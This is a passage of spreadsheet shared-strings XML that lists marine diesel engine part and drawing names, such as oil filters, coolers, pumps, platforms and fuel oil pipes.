    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING FOR MANHOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING FOR COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe arr. for automatic filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing tube</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING LUB. OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARTRIDGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUTOMATIC FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PRESS.LIMIT.VALVE, LUB.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Filter insert w/o candles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotary slide valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston for oil press.regulation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Body, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit for cover nut, centrifugal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure spring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit f. valve, centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Kit f. seals, centrifugal filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDEPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE COOLER LUB. OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME PLATE FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE COOLER LUBE OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE COOLER FRESH WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER LINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMB.LUB.OIL &amp; F.W.COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE OIL COOLER, PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE OIL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTMENT OF LUBRICATORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD CHANGE DEVICE/MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR LUBRICATOR DR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOSAGE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR BLOCK, LUBRI.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lubricator, foreign drawings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY GUIDE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CIRCUIT BOARD - MCU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CIRCUIT BOARD - SBU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE FOR GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACTUATOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO VALVE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WORM WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tachometer drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PORTABLE PRESSURE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST GAS TEMP. MONITORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE TURKISH TEXT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE ICELANDIC TEXT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING FOR MANOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN F. REMOTE INDICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS. GAUGE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFERENCE PRESSURE GUAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD F.PRESS.GAUGE PANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE FOR P 140</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACK. F.INSTRUMENT PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIVIDING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATES FOR FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH KNOB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB OIL PUMP WITH DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil pump, CW, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil pump, CCW, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE welding flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling packet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gear shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Driving Gear shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL PUMP COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR WHEEL SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRIC MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR ADJUSTING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gasket kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Casing insert</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft Sealing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pre. lub. oil pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermostat valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>One way valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Prelubricating pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>M. OF OIL THERM. IN FEB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF WATER PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alternator cooling connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Double check valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. Oil pressure regualtor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil thermostatic valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure relief</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front end box, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front end box, finish machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dummies for pumps, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft end box, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft end box, premounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft end box, pressure tested</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft end box, machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRACE BALL BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seawater cool. pump, arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAWATER COOL. PUMP COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESH WATER PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP CHARACTERISTIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suppl. draw., cool. water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sea water pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL GAS INLET BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate wheel, pump drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF T.C. AND A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr.of VT Equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUT-OUT VALVE T/C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES F.CHEM.CLEAN.A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THROTTLE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER CLEANING CURTAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING GUN FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCH. CLEANING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR COOLER CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting tool, Aux.blover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.UPPER-MAN SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET, FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, PLATFORMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seating, TC/AC machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING, TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANE BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING, CRANE BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANCHION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-UPPER-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-UPPER-EXH. SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-CENTRE-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-CENTRE-REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-LOWER-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM INSIDE CRANKCASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM WITH LADDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOOR AND COVER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING FOR COPPER COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stairway</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRINGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTT-STRAP,STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTT-STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.ARR-UPP.MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME F.GALL.GRATE W.RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY GRATE W. RAILING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK MATR. FOR CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL PACKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protective emitter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pen locking nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Solder cone</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Self tapping ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Motor contactor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Countersunk screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOPPER-SEGMENT HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING UPP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOPPER SEGMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOPPER SEGMENT - FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOPPER SEGMENT - AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, SEGMENT STOPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST RING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST RING, UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST RING, LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HAND NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL THROW RING-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD,LIFT OF THRUST SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISMANTLING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAUGE PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHT.GAUGE SEGM.STOPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARRYING IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL,MOVABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FUEL OIL DRAIN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH PRESS.FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATING TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-DRAIN FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL OUTLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL LEAKAGE ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE, WASTE TRAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF COOLING OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL OUTLET ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL RETURN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BY-PASS PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FROM FUEL PUMP DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE F.FUEL O.EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FUEL OIL CONNECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING - VITON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAP FOR DELIVERY PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE F.COOL.O.INL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE FOR INERT GAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE LUB.O. F.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF FLEX. CONNECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL INJECTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRW.F.FUEL INJ.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND SEAL RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND WIRE ESP.-RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR PIPE CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSE FOR ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL INLET-PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING, VITON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE-COOL.OIL INL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE-COOL.OIL OUTL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE-FUEL OIL OUTL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL SADDLE FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR DRAIN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT-DISTRIBUTION PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting piece, HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nipple, HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE BODY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR MEMBRANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIVET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DSIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Anti-splashing tape</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Miscellaneous (Fuel oil)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.MANDREL-F.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER-FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSE-MILL.TOOL-H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE-MILL.TOOL-H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL MANIFOLD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRACER HEATING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEAN. SYSTEM F/FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING OIL DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Low pressure fuel oil arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Leak oil from fuel inj. valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Leak oil from fuel inj. pumps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fuel oil pipe, re-fitting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Branch pipe fuel oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Specific fuel oil consumption</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO Cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MDO Cooler diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Covering for fuel oil pipes, HFO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insulaton for fuel oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE TORS.VIB.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-LUB.OIL CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
